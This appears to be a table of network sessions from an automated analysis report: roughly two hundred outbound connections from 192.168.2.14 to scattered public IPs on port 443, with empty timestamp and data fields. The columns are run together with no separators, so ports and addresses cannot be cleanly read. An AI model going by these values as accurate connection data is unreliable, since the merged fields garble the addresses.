                                                        12881192.168.2.1441708175.136.237.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12882192.168.2.1456440102.144.155.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12883192.168.2.1434320216.4.96.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12884192.168.2.143640850.177.143.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12885192.168.2.1435722160.26.123.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12886192.168.2.1445314119.192.50.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12887192.168.2.144327046.9.92.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12888192.168.2.1454712168.222.95.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12889192.168.2.143364237.168.181.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12890192.168.2.1435254122.88.205.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12891192.168.2.1457364223.198.248.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12892192.168.2.145061687.71.26.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12893192.168.2.1451830199.142.249.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12894192.168.2.145417497.253.76.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12895192.168.2.1451960211.219.81.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12896192.168.2.144229285.110.216.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12897192.168.2.143534414.238.133.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12898192.168.2.1458382159.178.0.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12899192.168.2.1455206155.171.118.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12900192.168.2.144363285.11.170.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12901192.168.2.1437938106.96.186.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12902192.168.2.1457176150.232.241.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12903192.168.2.143504893.96.20.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12904192.168.2.1438024140.184.197.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12905192.168.2.1448852204.52.242.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12906192.168.2.1453652181.219.23.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12907192.168.2.143766465.38.172.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12908192.168.2.144622213.71.137.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12909192.168.2.1460528153.218.73.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12910192.168.2.14584368.174.155.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12911192.168.2.1444964184.7.61.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12912192.168.2.143541623.125.84.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12913192.168.2.145827672.9.168.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12914192.168.2.145020217.31.127.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12915192.168.2.1456794210.224.41.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12916192.168.2.144389495.191.70.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12917192.168.2.1435518168.33.215.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12918192.168.2.144867659.0.52.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12919192.168.2.145127077.140.163.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12920192.168.2.145838637.211.40.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12921192.168.2.145245866.69.132.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12922192.168.2.1438602119.107.241.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12923192.168.2.1440662152.253.149.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12924192.168.2.144262265.59.106.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12925192.168.2.144158054.25.157.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12926192.168.2.143434847.208.209.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12927192.168.2.1453274145.141.48.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12928192.168.2.143463083.94.155.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12929192.168.2.14587942.152.125.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12930192.168.2.1454354193.13.206.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12931192.168.2.144159662.105.220.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12932192.168.2.1446226200.174.54.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12933192.168.2.1452216194.193.128.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12934192.168.2.143804049.203.119.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12935192.168.2.1449264109.29.162.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12936192.168.2.144445417.68.109.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12937192.168.2.144692440.225.89.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12938192.168.2.146030663.85.186.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12939192.168.2.144272657.207.162.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12940192.168.2.143772250.148.134.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12941192.168.2.1454914199.152.61.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12942192.168.2.144886239.109.144.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12943192.168.2.1444722124.46.26.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12944192.168.2.144324441.245.200.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12945192.168.2.143381827.72.188.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12946192.168.2.144229631.190.46.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12947192.168.2.1435574157.139.80.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12948192.168.2.143515851.161.142.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12949192.168.2.144284848.119.32.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12950192.168.2.1449736203.33.199.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12951192.168.2.143876865.19.170.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12952192.168.2.1435258132.22.95.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12953192.168.2.144094650.7.39.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12954192.168.2.144610854.151.168.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12955192.168.2.1438136150.166.50.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12956192.168.2.1440640159.81.240.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12957192.168.2.1434994192.187.187.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12958192.168.2.143528874.171.126.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12959192.168.2.145624861.199.18.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12960192.168.2.1454502218.110.151.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12961192.168.2.145548499.35.183.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12962192.168.2.145402823.136.25.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12963192.168.2.1450934185.196.145.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12964192.168.2.145485899.227.38.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12965192.168.2.1434674206.82.24.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12966192.168.2.14372364.188.234.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12967192.168.2.145895052.221.201.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12968192.168.2.145991848.12.215.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12969192.168.2.144189842.169.172.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12970192.168.2.143463077.31.78.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12971192.168.2.1449808112.154.30.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12972192.168.2.14389344.33.90.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12973192.168.2.144128839.49.226.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12974192.168.2.1441294121.217.166.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12975192.168.2.145483660.63.143.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12976192.168.2.145067443.142.117.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12977192.168.2.145069419.131.53.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12978192.168.2.143421098.56.74.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12979192.168.2.1444534126.246.78.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12980192.168.2.1436666152.10.34.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12981192.168.2.1445382174.248.134.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12982192.168.2.1445770105.109.241.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12983192.168.2.1455394158.53.41.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12984192.168.2.1454698173.178.23.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12985192.168.2.144055488.210.23.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12986192.168.2.145736284.118.139.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12987192.168.2.1445240186.182.253.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12988192.168.2.1460700184.36.172.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12989192.168.2.1452346207.89.33.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12990192.168.2.1460390216.36.157.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12991192.168.2.1453420102.52.215.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12992192.168.2.1449942140.213.28.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12993192.168.2.1459440207.103.9.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12994192.168.2.144346045.206.28.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12995192.168.2.1439310222.38.80.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12996192.168.2.144831682.181.176.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12997192.168.2.1438116180.210.238.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12998192.168.2.144211285.148.75.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12999192.168.2.14515842.7.207.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13000192.168.2.1448016217.57.192.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13001192.168.2.145062077.214.28.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13002192.168.2.1433252184.130.184.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13003192.168.2.1437286139.246.170.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13004192.168.2.1438082123.75.15.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13005192.168.2.1433570116.28.103.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13006192.168.2.1443440117.188.33.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13007192.168.2.145338040.58.202.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13008192.168.2.143587869.53.129.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13009192.168.2.145861089.103.65.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13010192.168.2.1440780131.240.58.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13011192.168.2.1457766163.168.188.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13012192.168.2.145456263.28.123.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13013192.168.2.1448960198.44.227.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13014192.168.2.1450894103.194.94.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13015192.168.2.143508014.165.77.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13016192.168.2.1450560110.167.223.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13017192.168.2.1459552123.117.207.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13018192.168.2.1449328114.230.173.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13019192.168.2.1439636176.137.53.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13020192.168.2.143995265.82.185.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13021192.168.2.1437238180.13.84.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13022192.168.2.143883218.83.20.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13023192.168.2.1434366209.39.133.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13024192.168.2.143802446.28.120.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13025192.168.2.145615075.242.66.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13026192.168.2.1437908204.90.178.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13027192.168.2.144271827.224.198.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13028192.168.2.1460788200.98.39.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13029192.168.2.145078613.68.188.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13030192.168.2.1460352118.10.106.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13031192.168.2.1458698193.95.22.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13032192.168.2.1444056100.17.122.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13033192.168.2.144797481.31.250.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13034192.168.2.144899472.103.73.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13035192.168.2.1440032129.121.73.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13036192.168.2.146084473.117.111.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13037192.168.2.1438388100.10.44.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13038192.168.2.143417413.152.93.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13039192.168.2.145314099.212.26.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13040192.168.2.145776888.222.157.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13041192.168.2.144237674.253.225.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13042192.168.2.1433232166.230.130.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13043192.168.2.1459040196.151.244.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13044192.168.2.1449364183.166.24.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13045192.168.2.145822035.135.41.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13046192.168.2.14346865.248.129.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13047192.168.2.144603618.164.202.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13048192.168.2.1453938136.5.185.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13049192.168.2.1455920155.77.55.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13050192.168.2.145391440.136.235.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13051192.168.2.1460168142.145.242.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13052192.168.2.1434164205.118.88.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13053192.168.2.143817271.155.47.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13054192.168.2.1440464143.227.137.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13055192.168.2.1450354182.181.126.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13056192.168.2.144959618.49.217.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13057192.168.2.144511291.60.160.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13058192.168.2.1452704131.23.215.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13059192.168.2.145390482.234.129.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13060192.168.2.143802227.95.240.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13061192.168.2.145661468.102.188.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13062192.168.2.1441148114.3.53.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13063192.168.2.145328685.48.86.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13064192.168.2.143752279.249.156.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13065192.168.2.145430435.74.113.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13066192.168.2.1460754195.203.182.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13067192.168.2.1452208175.113.125.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13068192.168.2.1441386136.182.66.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13069192.168.2.1437160178.200.118.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13070192.168.2.145477847.108.0.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13071192.168.2.1439022128.236.33.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13072192.168.2.145120267.84.143.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13073192.168.2.1437914168.154.187.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13074192.168.2.143371078.162.146.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13075192.168.2.1459866120.234.18.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13076192.168.2.1447760217.203.203.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13077192.168.2.1432778109.230.219.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13078192.168.2.145620225.233.193.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13079192.168.2.1446560217.59.127.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13080192.168.2.144532691.177.89.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13081192.168.2.145595468.130.55.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13082192.168.2.1451402184.210.216.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13083192.168.2.143631081.64.21.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13084192.168.2.143793885.228.198.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13085192.168.2.1443720177.240.59.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13086192.168.2.144659818.96.120.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13087192.168.2.14510002.136.130.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13088192.168.2.144955643.80.160.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13089192.168.2.143775820.122.193.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13090192.168.2.1437760198.215.147.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13091192.168.2.1444076162.223.28.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13092192.168.2.14568764.0.144.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13093192.168.2.144871681.92.234.211443
                                                        TimestampBytes transferredDirectionData


